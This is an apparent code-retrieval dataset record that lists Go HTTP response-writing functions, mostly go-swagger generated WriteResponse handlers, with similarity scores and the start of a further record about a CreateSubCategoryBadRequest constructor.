cacheControl)\n\t}\n\n\t// response header Expires\n\n\texpires := o.Expires\n\tif expires != \"\" {\n\t\trw.Header().Set(\"Expires\", expires)\n\t}\n\n\t// response header Last-Modified\n\n\tlastModified := o.LastModified\n\tif lastModified != \"\" {\n\t\trw.Header().Set(\"Last-Modified\", lastModified)\n\t}\n\n\trw.WriteHeader(200)\n\tpayload := o.Payload\n\tif payload == nil {\n\t\tpayload = make(models.GetCharactersCharacterIDOpportunitiesOKBody, 0, 50)\n\t}\n\n\tif err := producer.Produce(rw, payload); err != nil {\n\t\tpanic(err) // let the recovery middleware deal with this\n\t}\n\n}", "func (o *WeaviateThingsGetNotImplemented) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(501)\n}", "func (c *UpdateSwitch) WriteResponse(rw http.ResponseWriter, rp runtime.Producer) {\n\tswitch c.Request.Method {\n\tcase http.MethodPost:\n\t\tc.postUpdateSwitch(rw, rp)\n\tdefault:\n\t\tc.notSupported(rw, rp)\n\t}\n}", "func (c *UpdateSwitch) WriteResponse(rw http.ResponseWriter, rp runtime.Producer) {\n\tswitch c.Request.Method {\n\tcase http.MethodPost:\n\t\tc.postUpdateSwitch(rw, rp)\n\tdefault:\n\t\tc.notSupported(rw, rp)\n\t}\n}", "func (o *UpdateLinkInPostOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *GetChatroomsIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *GetEchoNameOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *GetUIContentOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *ListVsphereResourceOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func ResponseWrite(w http.ResponseWriter, responseCode int, responseData interface{}) {\n\t// Write Response\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(responseCode)\n\n\t// Write JSON to Response\n\tjson.NewEncoder(w).Encode(responseData)\n}", "func writeHTTPResponseInWriter(httpRes http.ResponseWriter, httpReq *http.Request, nobelPrizeWinnersResponse []byte, err error) {\n\tif err != nil {\n\t\tlog.Println(err.Error())\n\t\thttp.Error(httpRes, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\tlog.Printf(\"Request %s Succesfully Completed\", httpReq.RequestURI)\n\thttpRes.Header().Set(\"Content-Type\", \"application/json\")\n\thttpRes.Write(nobelPrizeWinnersResponse)\n}", "func (o *PostKeysKeyOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n}", "func (o *Operation) writeResponse(rw io.Writer, v interface{}) {\n\terr := json.NewEncoder(rw).Encode(v)\n\tif err != nil {\n\t\tlog.Errorf(\"Unable to send error response, %s\", err)\n\t}\n}", "func writeResponse(data interface{}, w http.ResponseWriter) error {\n\tvar (\n\t\tenc []byte\n\t\terr error\n\t)\n\tenc, err = json.Marshal(data)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn fmt.Errorf(\"Failure to marshal, err = %s\", err)\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tn, err := w.Write(enc)\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn fmt.Errorf(\"Failure to write, err = %s\", err)\n\t}\n\tif n != len(enc) {\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn fmt.Errorf(\"Short write sent = %d, wrote = %d\", len(enc), n)\n\t}\n\treturn nil\n}", "func (o *CreateUserOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *UpdateMoveTaskOrderPostCounselingInformationOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func WriteResponse(rw io.Writer, v interface{}) {\n\terr := json.NewEncoder(rw).Encode(v)\n\tif err != nil {\n\t\tlogger.Errorf(\"Unable to send error response, %s\", err)\n\t}\n}", "func (o *PutQuestionOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (r *response) Write(b []byte) (n int, err error) {\n\tif !r.headersSend {\n\t\tif r.status == 0 {\n\t\t\tr.status = http.StatusOK\n\t\t}\n\t\tr.WriteHeader(r.status)\n\t}\n\tn, err = r.ResponseWriter.Write(b)\n\tr.size += int64(n)\n\treturn\n}", "func (o *PostOperationsDeleteP2PPathCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func (o *HealthGetOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *WeaviateThingsPatchNotImplemented) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(501)\n}", "func (o *VerifyEmailTokenOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *WeaviateThingsGetOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *DeleteServiceIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *Operation) writeResponse(rw io.Writer, v interface{}) {\n\terr := json.NewEncoder(rw).Encode(v)\n\t// as of now, just log errors for writing response\n\tif err != nil {\n\t\tlogger.Errorf(\"Unable to send error response, %s\", err)\n\t}\n}", "func (o *PostOperationsGetNodeEdgePointDetailsCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func (o *UserEditOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *WeaviatePeersAnnounceOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n}", "func (o *CertifyOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func writeResponse(writer http.ResponseWriter, response *http.Response) (int64, error) {\n\tdefer response.Body.Close()\n\twriteResponseHeaders(writer, response, false)\n\treturn io.Copy(writer, response.Body)\n}", "func (o *PutMeetupDefault) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(o._statusCode)\n}", "func (o *FingerPathsPostCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func (o *PostPlaybookOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *UpdateHostIgnitionCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func (o *GetCharactersCharacterIDLocationOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\t// response header Cache-Control\n\n\tcacheControl := o.CacheControl\n\tif cacheControl != \"\" {\n\t\trw.Header().Set(\"Cache-Control\", cacheControl)\n\t}\n\n\t// response header Expires\n\n\texpires := o.Expires\n\tif expires != \"\" {\n\t\trw.Header().Set(\"Expires\", expires)\n\t}\n\n\t// response header Last-Modified\n\n\tlastModified := o.LastModified\n\tif lastModified != \"\" {\n\t\trw.Header().Set(\"Last-Modified\", lastModified)\n\t}\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *GetPingDefault) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(o._statusCode)\n}", "func (o *PostManagementKubernetesIoV1NodesOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *PutPerformancesOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *StopAppAccepted) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(202)\n}", "func (o *GetFleetsFleetIDMembersOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\t// response header Cache-Control\n\n\tcacheControl := o.CacheControl\n\tif cacheControl != \"\" {\n\t\trw.Header().Set(\"Cache-Control\", cacheControl)\n\t}\n\n\t// response header Content-Language\n\n\tcontentLanguage := o.ContentLanguage\n\tif contentLanguage != \"\" {\n\t\trw.Header().Set(\"Content-Language\", contentLanguage)\n\t}\n\n\t// response header Expires\n\n\texpires := o.Expires\n\tif expires != \"\" {\n\t\trw.Header().Set(\"Expires\", expires)\n\t}\n\n\t// response header Last-Modified\n\n\tlastModified := o.LastModified\n\tif lastModified != \"\" {\n\t\trw.Header().Set(\"Last-Modified\", lastModified)\n\t}\n\n\trw.WriteHeader(200)\n\tpayload := o.Payload\n\tif payload == nil {\n\t\tpayload = make(models.GetFleetsFleetIDMembersOKBody, 0, 50)\n\t}\n\n\tif err := producer.Produce(rw, payload); err != nil {\n\t\tpanic(err) // let the recovery middleware deal with this\n\t}\n\n}", "func (o *GetMeetupsDefault) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(o._statusCode)\n}", "func (o *PostEventCreated) WriteResponse(rw http.ResponseWriter, producer httpkit.Producer) {\n\n\trw.WriteHeader(201)\n}", "func (o *GetTaskTaskIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *CreateTCPCheckAccepted) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\t// response header Reload-ID\n\n\treloadID := o.ReloadID\n\tif reloadID != \"\" {\n\t\trw.Header().Set(\"Reload-ID\", reloadID)\n\t}\n\n\trw.WriteHeader(202)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *PostOperationsGetNetworkElementListCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func (o *ServiceInstanceLastOperationGetOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\t// response header RetryAfter\n\n\tretryAfter := o.RetryAfter\n\tif retryAfter != \"\" {\n\t\trw.Header().Set(\"RetryAfter\", retryAfter)\n\t}\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *GetPiecesIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *GetTaskDetailsOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *UpdateClusterOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *GetDetailOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\trw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *GetServicesHaproxyRuntimeAclsIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (r *responseInfoRecorder) Write(b []byte) (int, error) {\n\tr.ContentLength += int64(len(b))\n\tif r.statusCode == 0 {\n\t\tr.statusCode = http.StatusOK\n\t}\n\treturn r.ResponseWriter.Write(b)\n}", "func (o *LogoutOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func (o *UploadFileOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(200)\n}", "func WriteResponse(w http.ResponseWriter, data interface{}) error {\n\tenv := map[string]interface{}{\n\t\t\"meta\": map[string]interface{}{\n\t\t\t\"code\": http.StatusOK,\n\t\t},\n\t\t\"data\": data,\n\t}\n\treturn jsonResponse(w, env)\n}", "func (o *WeaviateThingTemplatesCreateNotImplemented) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(501)\n}", "func (r *Responder) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\tfor k, v := range r.headers {\n\t\tfor _, val := range v {\n\t\t\trw.Header().Add(k, val)\n\t\t}\n\t}\n\n\trw.WriteHeader(r.code)\n\n\tif r.response != nil {\n\t\tif err := producer.Produce(rw, r.response); err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t}\n}", "func (o *GetGateSourceByGateNameAndMntOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *CreateSpoeCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(201)\n\tpayload := o.Payload\n\tif err := producer.Produce(rw, payload); err != nil {\n\t\tpanic(err) // let the recovery middleware deal with this\n\t}\n}", "func (o *Output) writeResponse(response string) error {\r\n\t// write the response\r\n\tif _, err := o.writer.WriteString(response + \"\\n\"); err != nil {\r\n\t\treturn err\r\n\t}\r\n\r\n\treturn nil\r\n}", "func (o *GetTransportByIDOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *TransferOK) WriteResponse(rw http.ResponseWriter, producer httpkit.Producer) {\n\n\trw.WriteHeader(200)\n\tif err := producer.Produce(rw, o.Payload); err != nil {\n\t\tpanic(err) // let the recovery middleware deal with this\n\t}\n\n}", "func (o *CreateUserCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(201)\n}", "func (o *ViewOneOrderOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (o *GetVisiblePruebasFromQuestionTestInternalServerError) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.Header().Del(runtime.HeaderContentType) //Remove Content-Type on empty responses\n\n\trw.WriteHeader(500)\n}", "func (o *GetWhaleTranfersOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tpayload := o.Payload\n\tif payload == nil {\n\t\t// return empty array\n\t\tpayload = make([]*models.OperationsRow, 0, 50)\n\t}\n\n\tif err := producer.Produce(rw, payload); err != nil {\n\t\tpanic(err) // let the recovery middleware deal with this\n\t}\n}", "func (o *SearchTournamentsOK) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(200)\n\tpayload := o.Payload\n\tif payload == nil {\n\t\tpayload = make([]*models.Tournament, 0, 50)\n\t}\n\n\tif err := producer.Produce(rw, payload); err != nil {\n\t\tpanic(err) // let the recovery middleware deal with this\n\t}\n\n}", "func (o *CreateTCPCheckCreated) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(201)\n\tif o.Payload != nil {\n\t\tpayload := o.Payload\n\t\tif err := producer.Produce(rw, payload); err != nil {\n\t\t\tpanic(err) // let the recovery middleware deal with this\n\t\t}\n\t}\n}", "func (s *Server) writeInfoResponse(\n\tw http.ResponseWriter,\n\tr *http.Request,\n\tmessage []byte,\n\tstatus int,\n\theaders map[string]string,\n) {\n\tfor k, v := range headers {\n\t\tw.Header().Add(k, v)\n\t}\n\n\tw.WriteHeader(status)\n\tw.Write(message)\n}" ]
[ "0.81304365", "0.78822106", "0.7772603", "0.77724785", "0.7753003", "0.7741224", "0.76676315", "0.7638531", "0.7610215", "0.7580745", "0.75792986", "0.75681144", "0.7560947", "0.7558793", "0.75451237", "0.7542909", "0.7541853", "0.75351036", "0.75317055", "0.7520023", "0.75197107", "0.7512948", "0.75119436", "0.75060153", "0.75032663", "0.7498435", "0.7488388", "0.7483949", "0.7477941", "0.7468687", "0.7467289", "0.7466921", "0.7464827", "0.7463887", "0.7463887", "0.7461539", "0.74607104", "0.74594444", "0.7445936", "0.74437296", "0.74364424", "0.7428169", "0.742627", "0.74193496", "0.7414609", "0.7407497", "0.740679", "0.7405893", "0.7399214", "0.7389537", "0.73864824", "0.7380773", "0.73607856", "0.7360597", "0.7355258", "0.7355082", "0.7353997", "0.73482996", "0.7345686", "0.7328176", "0.7325791", "0.7318597", "0.73169374", "0.73163897", "0.7315758", "0.73130983", "0.7312643", "0.7310174", "0.73093194", "0.73014235", "0.7296487", "0.7291982", "0.7291501", "0.72891283", "0.7285318", "0.72836924", "0.7282427", "0.7280994", "0.7275351", "0.72748315", "0.7273309", "0.7272943", "0.7269458", "0.7269213", "0.72688186", "0.7266069", "0.7261708", "0.7253967", "0.7251768", "0.7249987", "0.72485304", "0.724809", "0.7241035", "0.7239367", "0.7237185", "0.72348326", "0.7228545", "0.72232014", "0.72160393", "0.7215001", "0.7212855" ]
0.0
-1
NewCreateSubCategoryBadRequest creates CreateSubCategoryBadRequest with default headers values
func NewCreateSubCategoryBadRequest() *CreateSubCategoryBadRequest { return &CreateSubCategoryBadRequest{} }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func NewCreateCategoryBadRequest() *CreateCategoryBadRequest {\n\treturn &CreateCategoryBadRequest{}\n}", "func TestCreateCategoryEmptyBody (t *testing.T) {\n\t//initial length of []Categories\n\tinitialLen := len(Categories)\n\t//empty body\n\trequestBody := &Category{}\n\tjsonCategory, _ := json.Marshal(requestBody)\n\treq, err := http.NewRequest(\"POST\", \"/categories/new\", bytes.NewBuffer(jsonCategory))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\trr := httptest.NewRecorder()\n\thandler := http.HandlerFunc(CreateCategory)\n\n\thandler.ServeHTTP(rr, req)\n\n\tassert.Equal(t, 422, rr.Code, \"Unprocessable Entity response is expected\")\n\t//the length of []Categories should not change after trying to create new empty category\n\tassert.Equal(t, initialLen, len(Categories), \"Expected length to stay the same after adding empty category name\")\n}", "func CreateCompanyBranchHyCompanybranchBadRequest(t goatest.TInterface, ctx context.Context, service *goa.Service, ctrl app.HyCompanybranchController, id int, payload *app.CreateCompanyBranchHyCompanybranchPayload) (http.ResponseWriter, error) {\n\t// Setup service\n\tvar (\n\t\tlogBuf bytes.Buffer\n\t\tresp interface{}\n\n\t\trespSetter goatest.ResponseSetterFunc = func(r interface{}) { resp = r }\n\t)\n\tif service == nil {\n\t\tservice = goatest.Service(&logBuf, respSetter)\n\t} else {\n\t\tlogger := log.New(&logBuf, \"\", log.Ltime)\n\t\tservice.WithLogger(goa.NewLogger(logger))\n\t\tnewEncoder := func(io.Writer) goa.Encoder { return respSetter }\n\t\tservice.Encoder = goa.NewHTTPEncoder() // Make sure the code ends up using this decoder\n\t\tservice.Encoder.Register(newEncoder, \"*/*\")\n\t}\n\n\t// Validate payload\n\terr := payload.Validate()\n\tif err != nil {\n\t\te, ok := err.(goa.ServiceError)\n\t\tif !ok {\n\t\t\tpanic(err) // bug\n\t\t}\n\t\treturn nil, e\n\t}\n\n\t// Setup request context\n\trw := httptest.NewRecorder()\n\tu := &url.URL{\n\t\tPath: fmt.Sprintf(\"/api/company/branch/%v\", id),\n\t}\n\treq, _err := http.NewRequest(\"POST\", u.String(), nil)\n\tif _err != nil {\n\t\tpanic(\"invalid test \" + _err.Error()) // bug\n\t}\n\tprms := url.Values{}\n\tprms[\"ID\"] = []string{fmt.Sprintf(\"%v\", id)}\n\tif ctx == nil {\n\t\tctx = context.Background()\n\t}\n\tgoaCtx := goa.NewContext(goa.WithAction(ctx, \"HyCompanybranchTest\"), rw, req, prms)\n\tcreateCompanyBranchCtx, __err := app.NewCreateCompanyBranchHyCompanybranchContext(goaCtx, req, service)\n\tif __err != nil {\n\t\t_e, _ok := __err.(goa.ServiceError)\n\t\tif !_ok {\n\t\t\tpanic(\"invalid test data \" + __err.Error()) // bug\n\t\t}\n\t\treturn nil, _e\n\t}\n\tcreateCompanyBranchCtx.Payload = payload\n\n\t// Perform action\n\t__err = ctrl.CreateCompanyBranch(createCompanyBranchCtx)\n\n\t// Validate response\n\tif __err != nil {\n\t\tt.Fatalf(\"controller returned %+v, logs:\\n%s\", __err, logBuf.String())\n\t}\n\tif rw.Code != 400 {\n\t\tt.Errorf(\"invalid response status code: got %+v, expected 400\", rw.Code)\n\t}\n\tvar mt error\n\tif resp != nil {\n\t\tvar __ok bool\n\t\tmt, __ok = resp.(error)\n\t\tif !__ok {\n\t\t\tt.Fatalf(\"invalid response media: got variable of type %T, value %+v, expected instance of error\", resp, resp)\n\t\t}\n\t}\n\n\t// Return results\n\treturn rw, mt\n}", "func CreateBadRequest(errorMessage string) BadRequest {\n\treturn BadRequest{Error: errorMessage}\n}", "func (ctx *CreateItemContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (ctx *SubPshbContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (o *CreateSubCategoryBadRequest) WriteResponse(rw http.ResponseWriter, producer runtime.Producer) {\n\n\trw.WriteHeader(400)\n}", "func NewCreateSubaccountBadRequest() *CreateSubaccountBadRequest {\n\treturn &CreateSubaccountBadRequest{}\n}", "func TestCreateCategoryWrongJSONSyntax(t *testing.T) {\n\t//initial length of []Categories\n\tinitialLen := len(Categories)\n\t//parameters passed to request body\n\trequestBody := `{{\"CategoryID\":\"bq4fasj7jhfi127rimlg\",\"CategoryName\":\"Name\",,,}}`\n\treq, err := http.NewRequest(\"POST\", \"/categories/new\", bytes.NewBufferString(requestBody))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\trr := httptest.NewRecorder()\n\thandler := http.HandlerFunc(CreateCategory)\n\n\thandler.ServeHTTP(rr, req)\n\n\tassert.Equal(t, 400, rr.Code, \"Bad request response is expected\")\n\tassert.Equal(t, initialLen, len(Categories), \"Expected length to stay the same after wrong syntax json\")\n\n}", "func (ctx *CreateOutputContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func (ctx *CreateHostContext) BadRequest() error {\n\tctx.ResponseData.WriteHeader(400)\n\treturn nil\n}", "func (ctx *CreateMessageContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func ValidateCreateBadRequestResponseBody(body *CreateBadRequestResponseBody) (err error) {\n\tif body.Name == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"name\", \"body\"))\n\t}\n\tif body.ID == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"id\", \"body\"))\n\t}\n\tif body.Message == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"message\", \"body\"))\n\t}\n\tif body.Temporary == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"temporary\", \"body\"))\n\t}\n\tif body.Timeout == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"timeout\", \"body\"))\n\t}\n\tif body.Fault == nil {\n\t\terr = goa.MergeErrors(err, goa.MissingFieldError(\"fault\", \"body\"))\n\t}\n\treturn\n}", "func (ctx *CreateFeedContext) BadRequest(r error) error {\n\tif ctx.ResponseData.Header().Get(\"Content-Type\") == \"\" {\n\t\tctx.ResponseData.Header().Set(\"Content-Type\", \"application/vnd.goa.error\")\n\t}\n\treturn ctx.ResponseData.Service.Send(ctx.Context, 400, r)\n}", "func CreateCategory (w http.ResponseWriter, r *http.Request) {\n\tvar newCategory Category\n\n\t//get the information containing in request's body\n\t//or report an error\n\treqBody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tfmt.Fprintf(w, \"Kindly enter data with the category name and description only in order to update\")\n\t\tlog.Fatal(err.Error())\n\t}\n\n\t//generate unique categoryID\n\tnewCategory.CategoryID = xid.New().String()\n\t//unmarshal the information from JSON into the Category instance\n\t//or report an error\n\tif err = json.Unmarshal(reqBody, &newCategory); err != nil {\n\t\tlog.Printf(\"Body parse error, %v\", err.Error())\n\t\tw.WriteHeader(400)\n\t\treturn\n\t}\n\n\t//CategoryName is required field\n\tif len(newCategory.CategoryName) == 0 {\n\t\tw.WriteHeader(422)\n\t\tfmt.Fprintf(w, \"Kindly enter data with the category name in order to create new category\")\n\t\treturn\n\t}\n\n\t//append the new category to the slice\n\tCategories = append(Categories, newCategory)\n\tw.WriteHeader(http.StatusCreated)\n\n\t//return the category in response\n\t//or report an error\n\tif err = 